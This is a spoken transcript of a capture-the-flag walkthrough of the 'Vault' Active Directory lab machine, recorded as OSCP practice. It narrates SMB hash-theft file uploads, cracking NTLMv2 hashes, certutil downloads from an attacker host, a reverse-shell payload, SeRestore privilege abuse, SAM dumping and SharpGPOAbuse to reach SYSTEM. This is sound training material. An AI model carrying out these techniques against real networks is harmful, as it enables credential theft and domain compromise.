Hello everyone. So today we're gonna do another Windows Active Directory machine. The name is called Vault. It is a hard machine, so we'll see how things are gonna turn out. So I already ran the Nmap scan this time, um, and copied my notes over to Obsidian already. So I'm just gonna clear this screen out. Um, so what do we have? We have DNS, Kerberos open, MSRPC, LDAP again, kpassword. So I like to just like group these together. LDAP can go below the other LDAP port. And then SMB can go with 135. It doesn't look like we have any web server here. We have WinRM here, and then .NET message framing. These are RPC as well. We have an RDP session, RDP port open. Okay, let's start with adding it to our Etsy hosts. Vault.offsec, dc vault.offsec. Okay, let's start with nm for Linux ng and see what we're gonna get it. Excuse me. We didn't have anything, just to be safe. Let's run the normal nm for Linux as well. It thinks that it's a Windows 10 server 2019. It might be 2016 as well. Just on the background, I'm gonna run a UDP scan. Okay, we didn't have anything. Let's go with the LDAP search. These were from the previous machine. Vault.offsec and then vault.offsec. So we didn't have anything here. Let's clear this up and make the search base empty. Let's take a look at that again. LDAP search. Let's specify a space, naming, contexts. Okay, we don't have much. So I remember last time when I do -h and the IP, it doesn't give us anything because it thinks that -h is like a help flag. But I guess we don't have anything from that as well. What can we go for? Let's see if we have anything with DNS. We have A records, name server, and SOA. What are we missing there? Windows RPC. Let's go with RPC client. So RPC client dash I and then the IP. No, not like that. What about just RPC client and then IP? So it asks for a password, which we don't have. But what are these? Let's see if we have any more ways of using RPC client command. So maybe like that. The user is empty and then dash n. Yeah, status denied. Okay, we need some valid credentials to be able to pull data from that. For the UDP scan, I mean LDAP, NTP, Kerberos, and the DNS, which we already know these. Interesting. Are we missing any web portal here? Possibly. So this is key password. This is RPC as well. Let's make sure. Port 593. Yeah, that's RPC. This 636. Yeah, this is the encrypted LDAP server. What about this one? Port 3269. This is also, yeah, this is also the LDAP port, one of the LDAP ports as well. This is WinRM. This is .NET. Can we do anything with the 9389? Let's see, Hacktricks. It doesn't allow us to search. Oh, here we go. Port 9389. Anything? No. .NET. Yeah, we don't have anything. I wonder if I'm missing any port. Well, let's run the nmap scan one more time. Or actually not nmap, but let's run rust scan -a, change the IP, and then -sc -sb. How do we specify the nmap flags? Let's just run it like this. So 53, 88, 135, 139, 389, 445, 464, 593. Do we have 593 here? Did we see 5? Yeah, 593. Let's try to see if we can see any shares. We can see some shares. Can we read them? Oh, we have a document share that is interesting. Oh. We don't have anything. No. Mm. Let's exit out of this. What about? Probably not, but let's give it a try. IPC. Nothing here. Net logon. Nothing here. And lastly, sysvol. Nothing here as well. So interestingly, we can get inside the documents share, but there's nothing in it. Okay. Can we like upload anything? Let's see. Test.txt. Let's go in again. Not upload. Put test.txt. Yes, we can put some, we can upload files into this documents share, SMB share. So we can upload stuff. What can we upload and then possibly call it somewhere else? Wait. So this is the default RPC port. What if we try to RPC client and then specify the port as 593? What's happening? Can I connect to the server? Okay, so we cannot connect to the server no matter what the port is, I believe. Excuse me. So the interesting part to me is we can upload. What happened to our machine? Can we ping it? No. Let me restart it and come back. Okay, so we're back. I don't know what happened, but I had to kill the VPN session and then run it again. So now we can successfully ping our, what the, I don't know what the problem is. Let me stop it and come back again. Well, it looks like the machine is really not stable because I can ping it and okay, I can ping it anyways. So yeah, what I was saying is the only thing that we have right now is being able to upload stuff. So put test.txt. Right, we can upload stuff, but instead of this text test.txt, let's actually try to generate a payload. We can use this one. Let's use port 445. Yeah, this looks good. Let's go back and then oh my god, is it is the machine down again? This, I don't know what is happening. Okay, it's interesting. Shell.exe. Okay, so we have the shell.exe here. Exit. I'm gonna try to log into our PC again. No, it doesn't work. Is it? Okay. I thought our PC is breaking something, but apparently not. So let's think. We uploaded a shell, a reverse shell payload into the SMB share. How can we call this? We cannot do anything with the LDAP. I don't think we have anything going on with the RDP as well because we will need a credential for that. Key password is not something we should focus. So this is WinRM. The only thing that I'm thinking is just .NET message framing. Let's try to see like .NET message framing roaming exploit. I already went to this before, I believe. It only works Windows, although some aspect. Let's try to go to this GitHub repository. Do we need a valid credential for this? Do we have to build this again? Yeah, I think we have to build this one as well. So I don't have Visual Studio. I can't run this. Let's see, search exploit.net RCE. Not much here. .NET exploit message framing exploit RCE. Is this the same thing? Run a web server on port 8080 and put the files exploit.txt and cmd.hta on its root, for example. Okay. Let's see what this is. Will this even work? Not sure. Okay, so I think what we're gonna try right now, since we couldn't get anything, is we can upload something, right? Like in the last video, when I was solving heist machine, I was able to basically listen the ton zero interface with responder and get a response there, and I was able to crack the hash. So I wonder, as soon as we upload something in this SMB share, probably some user is gonna click on it or do something there, and we're gonna get a user hash, and then we're gonna move our way in. So what I like to do is, like, let's go to Google. So SMB share upload, like, still NTLM hash maybe. Um Still in NTLM hashes with PDF. Um I'm not sure if the user will click on it if it's a PDF file. Why don't we just give this a try? You know, it doesn't hurt. Clear, git clone, cd ntlm. Let's just see the content ntlm pdf.py. Okay, it's taking input. Let's run this. Python 3 ntlm pdf. pip3 install report lab. Python m then source my env bin activate. No. Source env bin activate. Env env bin not python pip install. What was it? Report lab. What else we have to download? I think just report lab. And then let's run it like this. Python SMB server is going to be 192.168.45.223. Share name is going to be share. File name. Let's see, shell.exe should be the file name. So we're gonna upload this one, right? But let's sudo impacket smb share. Let's run our smb share real quick. Okay, and then smb client. What was the IP again? Documents share. Did we lose access again? Really? This is like the third time. I'm not sure why are we losing the access to it. The machine is really not stable. Yeah, it's gone. Let me restart again and come back, guys. Okay. I think the machine is up. Oh wait, exit until this is the file that we are supposed to upload. Put SMB custom link. And let's see if we're gonna get any hit. While waiting that, I'm gonna try to research more into this. NTLM theft, the tool for generating multiple types of NTLM v2 hash theft files. 21 different types of hash theft. These can be phishing. Okay, let's see if this is gonna work. Let's exit out of this. Git clone cd ntlm ntlm theft. It's probably gonna throw us error. Let's get our virtual environment. Nope, nothing yet. So Python mynv bin python 3 and then the ntlm theft py. Let's download these. Let's run again. Okay. So we need dash G to generate all. Dash S is going to be 192.168.45.223. File name is going to be phishing. Choose to generate all files or specific. Oh, we have to do. You have to do. So which ones do we need? Do we have anything? Nope. .scf browse. .url browse. I mean, why don't we create everything and then upload all of them, right? So it's under phishing. Why don't we upload all of them? MSF, not MSF, SMB client, put star. Can we, do we have to specify, do we have to write their names one by one? I have to upload multiple files into an SMB server in Linux. Oh yeah, okay. Recurse on, prompt off, input all. Let's go. Okay. So it's placing all the files inside of this directory, this SMB share. So let's see if we're gonna have any kind of hits back. I wonder if we need a responder instead of SMB share. Let's get this responder ready. As soon as we turn off this, we start this one. One nine two one six eight four five two two three. Oh yes, okay, we are cooking. I don't know which one worked, but we can make more research into it and see which one is actually working. But right now, I'm just gonna skip that and focus on the further enumeration. Let's copy this to our Vault folder. The username is Nano Anirudh. Okay, so the hashcat command is going to be -m5600, which is Intel MV2, and then the var user share wordlist rocku.txt. Let's run this. Okay, we got a quick hit. Secure HM is the password. We actually forgot to I always forgot to update my notes while recording the video, but let's just give this 445 SMB. We were able to upload lots of files and get a hit back with the username Anirudh. The password is secure HM. Okay, so we knew that the WinRM is open, so let's try to use Evil WinRM. The IP user is Anirudh, and then the password is secure HM. Okay, we have a shell. Perfect. We were able to log in using Evil WinRM with those credentials. Okay, let's see. Who am I all? What do we have? SE machine account, system privilege, backup privilege, restore privilege, shutdown privilege. So this is the one that I like to see. Maybe we can change a binary of a service and then try to shut down, reboot the machine. We have remote shutdown privilege. Okay. So let's see what kind of users we have. Net user domain. Okay, we don't have much. Let's run Bloodhound. SharpHound. I think we can run it through our Kelly box. Bloodhound Python. So it's going to be collection method all. The domain is going to be vault.offsec. Username is gonna be anyroth. Password is securehM. Let's see if the syntax is all correct. Bloodhound. I see one Python there. Yeah. So -c all user the domain. Let's see, dc fqdn is gonna be dc.vault.offsec. We can run this. Why are we getting... Let's not include -dc. Could not find the domain control. I mean, we didn't even specify the IP address, right? We were kind of dumb. Yeah, so DC, where is it? I believe name server should do it. And then -dc, dc.vault.offsec. Okay, we're getting it. On one domain, 5 users, 52 groups, 2 GPOs, 19 containers. Let's, on the side, let's exit from this, deactivate, clear, and then sudo neo4j start, and then locate our bloodhound. Oh no. Oh, it's gonna be OSCP tools bloodhound. Let's go to here. Bloodhound no sandbox. Okay. So we are done with this. I think what we can do is clear this database. Clear database. And then upload data. Windows machine, Vault, and then upload all these. Okay, we're done. Clear, finished. So we have access to aniroot. Let's mark this as owned. Effective inbound GPOs. Let's enable this always display as well. Let's go to analysis. Shortest path to domain admins. Do we have any path? No. So we can PS remote into DC, which we already did. We are a member of, this is kind of, we are a member of server operators, right? Yeah, we are a member of server operators. Let's make sure that. Um, we are actually not. Oh yeah, we are server operators. Sorry. Um, and we have a right tackle to, this is administrator. We have a right tackle to administrator group. Let's try to exploit this. To abuse right tackle to a group object, you may grant yourself the add member privilege. This can be accomplished using the add domain object ACL. In Power View, you may need to authenticate the domain. We already have the password and the credentials. Use add domain object ACL operation specifying credit if you're not already running a process as administrator. You can now add members to the group using the net binary or Power Views add domain group. Okay, let's locate Power View and then copy this to our working directory and then run our Python server. Cert util url cache http 192.168.45.23 powerview.ps1 powerview.ps1. Oh, it didn't work. Is it because of the backslash, sorry. Okay, yeah. Actually, before running this, let's grab the local.txt. Right, we forgot this. Also, let's close these tabs. Close this one, this one, this one, this one, this one, and also this one. Okay. Okay, we have Power View. Let's do PowerShell -ep bypass. This is basically bypasses the execution policy. And then let's call, oh, sorry, let's call powerview.ps1. Is not, oh yeah, it's not in desktop, it's in documents. Powerview.ps1. Okay, perfect. So let's just follow along this bloodhound way of abusing the right tackle. Okay. Let's do this. Secure HM, right? Yeah, secure HM. And then this. It's gonna be vault.offsec. The user is on your root. Let's double check on your root. Okay. The can use add domain object ACL, optionally specifying credit if you're not already running a process as administrator. Let's see if we can add ourselves to domain admins. It hangs. I wonder if it's going to throw us an error. So it's still hanging. I don't know why it's taking too long. It's probably not even running it. Let's close this and log back in. Did we lose these? I think we did. Let's run that again. Oh. The system cannot protect plain text input. What happened there? This is interesting. Because I was able to do it before. It's not allowing me to execute the whole command. Let's, instead of using add domain group member, let's use, instead of using the add domain object ACL, let's use add domain group member. And then the member is gonna be Anirudh. Oh, sorry, we have to call power view as well. Access is denied. This is interesting. Who has access to domain admins? Just administrator? Yeah, just administrator. Let's use the first command one more time. If this is not gonna work, I think I'm gonna go with the Linux way. Yeah, this is not working for some reason. Let's try to use the Windows Linux way. Impacket, tackle edit, action write, or let's just copy this whole thing. Right members, principal, controlled user, target DN, group distinguished name. So this is gonna be Anirudh. Just want to make sure we are giving the correct name. Anirudh, okay. Target DN is gonna be domain admins. Domain is gonna be vault.offsec, controlled user Anirudh, and then the password is secure-hm. Target principal not found in LDAP. Target principal is not found. Interesting. Let's remind ourselves our Power View commands here. Taking ID. Was it? No, not this one. Active Directory enumeration. Here you go. The target principal not found. We don't want service principal names. Let's see get user. Get net user. So do we have to capitalize the A here? And same as get domain, get AD domain. Let's use the NetBIOS name. Alt. Target DN. Get net group domain admins. Not group, it's group. Oops, sorry. Group, okay. So it should ideally work. Domain admins. Let's try to run it again. Target principal not found in LDAP. Let's see how we can use this again. In packet decal edit. Decal abuse. right tackle abuse windows. Are we supposed to use this whole when specifying the target DN? The server reports insufficient writes. I guess we were correct with this, but we don't have the permissions. This is kind of interesting because from this it looks like Anirudh is a member of server operator, and server operator group members have right tackle to administrator group, right? Let's see. First degree group membership, member of domain users, server operators, remote management. Unenrolled group. Domain users. Right tackle to default domain policy. Okay. Effective inbound GPOs. So, I mean, as you can see, server operators have generic right to administrator group, enterprise admins, and domain admins, but most importantly, it has right tackle to domain admins. What if we try to what if we try to, instead of using domain admins, let's do administrators and get the whole distinguished name. Insufficient permission. Let's see. So since this did not work for us, I think we're just gonna shift our focus to our privileges. So let's open the hack tricks here, and then go down to Active Directory, Windows local privilege escalation, access tokens, Um, let's see. SE backup restore. Nothing is here. SE backup. We have this SE restore. Let's see if we already have an RDP session, RDP login, xfree RDP. The IP is gonna be this. The user is gonna be Anirudh. Password is gonna be securehm. Why it failed? Is the connection down again? No. Let's specify the domain. Is it just /d? No, I think it's /d. Vault.obsec. Yeah, it's not working. This is interesting. So we don't have remote access. Shutdown privilege, backup privilege. I know if we have a backup privilege, we can dump the system and security hives. Yeah. Method 1 is non-DC, method 2 is DC. This is just too long. Let's try to use this. Okay. We have that. Then now we have to transfer this back to our Kali machine. SMB server. Okay. Some sudo SMB in packet. Okay. Oh, it's still executing the files that we put inside the SMB share. Net use k 192.168.45.223 share user Kali. The network name cannot be found. Oh, we have to put a space between these. And then copy item pad c temp system destination k system why it's hanging. Shouldn't take this long. Okay. And now for the SAM again. Okay, let's close this. We have system and SAM. Okay, so in packet secrets dump. Let's get a usage here. Okay, so it's gonna be local dash SAM system. Okay, so we have the administrator hash. This is the NT part, this is the LM part. So let's grab the NT part and try to use with evil in the RAM. User is gonna be administrator. The IP is gonna be this. Why it stalls? Oh, sorry. I'm mistaking. This is the LM hash, this is the NT hash. Come on, let me get out of here. Okay, you don't want me to get out of here. Oh, what happened? It still hangs. Not sure why. Yeah, I don't know why. Let's just keep that. So the backup and restore backup privilege didn't give us anything. Restore privilege. Let's try to Google this. Windows exploit. Prove to admin. The using token privileges for local privilege escalation. Not this one. We didn't have anything. SE restore privilege abuse. Let's see if we have anything from here. Maybe not. Abuse exploit GitHub. No. Yeah, we didn't have anything from this page as well. Not sure if let's see, GitHub. Let's search it through GitHub. Let's do a global search. Code. What is this? SeRestore. So if we run this and then our reverse shell, are we gonna get a shell back? Let's see. Where's the executable though? Binaries? Nope. Windows and AD. Um, so you're just gonna give us the way to use it, but not the actual binary, right? Perfect. Let's see. Download goods from this. But this is the uncompiled one. We need the compiled binary. What about here? This is the write-up. What about this one? I guess we found it, guys. SeRestore.Abuse.exe. Okay, let's download this. Not heist. Where's Vault? Here. Let's download this. Network is unreachable. Is it down again? Are we down again? Really? Destination is not reachable. Okay, perfect. Let me revert the machine again. Okay, I just reverted the machine back. Let's go to our Evelyn RAM and make sure, okay, SeRestore.Abuse.exe is here. Let's log back in. Download SeRestore.Abuse.exe. Do we have to give the full path? Like home FPV and then OSCP. Error, download failed, check file names or path. Okay. Do we have our Python server running? We don't. Let's spin this up. Oh, not in that directory. Okay. Cert util furl cache http 192.168.45.223 SeRestore abuse.exe abuse.exe. Okay, and once again, how do we use it? So restore abuse.exe and then the reverse shell. Okay, I think our reverse shell was on port 445, if I'm not mistaken. Abuse.exe. Where is our shell though? Did we download it? No, probably not. Shell.exe, shell.exe. Abuse.exe, and then let's give the full path. Shell.exe. Yes, we have a reverse shell. Who am I? Is it not gonna work? Who am I? No, it's not working. Is the architecture? Is the architecture good on this? Because I remember running it with x64 failed to run. Sysinfo? No. Oh yeah, access is denied. Okay. Let's see. MSF venom -p 445. Let's try to use a stageless one. Okay. We get, let's remove item shell.exe, not remote item, remove item, and then let's copy this again. And run this one more time. Run this one more time. Okay, we have a stable shell. Who am I? NT authority system. Let's navigate to users, administrator, desktop, and then type proof.txt. Let's grab our proof.txt and then submit it here. Okay, so I hope you enjoyed the video. It was a fun machine again. We didn't do much. I'm not sure if this is the intended way of solving the machine, because like back in the Bloodhound output, we see some right decals, and then also for the Anirudh user, why it's not showing me. Let's go to one of them. Okay, search for Anirudh. Why you're not taking me to that? Interesting. I don't know why. Can we refresh this? So I actually wanted to come back and record the last part of this machine. Um I used like a different straightforward method to compromise the domain, but there is another way that we can actually take advantage of the default domain policy. So the way we do that is let's I actually reverted the machine, but let's I believe our Python server is running. Let's download the Power View again. Um, like this, and then call it. So with the Power View, we're just going to do this. So get GPO name is going to be the default. So this is going to be the GPO that we are going to request. Default domain policy. So default domain policy. So the important things here is the GPO status, which has all settings enabled, which is good. And the actual thing that we want is the ID of this default domain policy, this string. So let's do get GP permission, GUID, and then paste the ID number, and then do target type is going to be user, target name is going to be our domain user, so any root, and then the GPO name is going to be sorry, actually there's no GPO name on this. Cannot bind parameters. Let's see what what are we doing wrong here. Let's try to run it again. Get GP permission, GUID, this is the ID, and then target type user, and then target name Anirudh. Okay, I don't know why this didn't work. But see, we have the permission, GPO edit, delete, modify. So what we can do is we can take advantage of a tool called SharpGPOAbuse, which will allow us to abuse this GPO permission, which has the edit, delete, and modify. So let's also download this to our target machine, http 192.168.45.223, SharpGPOAbuse.exe. Output is SharpGPOAbuse.exe. Now what we want to run is SharpGPOAbuse.exe -- add local admin -- user account is going to be the name of our user, Anirudh, and then GPO name is going to be default domain policy. Okay, great. So domain is vault.offsec. We have the distinguished name, file exists, and then the version number in gpt.ini was created and done. So the GPO was modified to include a new local domain. Wait for GPO refresh cycle. So as you know, we have to update the GPO to make it working right away. So the command on that is going to be gp update / force. This might take some time. Okay, so the GPO is updated. Let's see, net local group administrators. Okay, see, we added ourselves into the local administrator group. So how can we take advantage of this? Let's open a new shell. We can use impacket psexec vault.offsec, and then the user Anirudh, the passwords secure HM, and then the IP address, which is gonna be 192.168.131.172. It's going to request a share. It's writable because we are in the administrator group. If we do who am I, we are the entity authority system. If we go to users, administrator, and then desktop, you're going to see the flag here. For the OSCP exam, we need to take a screenshot that contains host name. We already did who am I, and then also the IP config. So actually let's type proof.txt as well. Taking a screenshot of all this will do the job. Thank you for watching.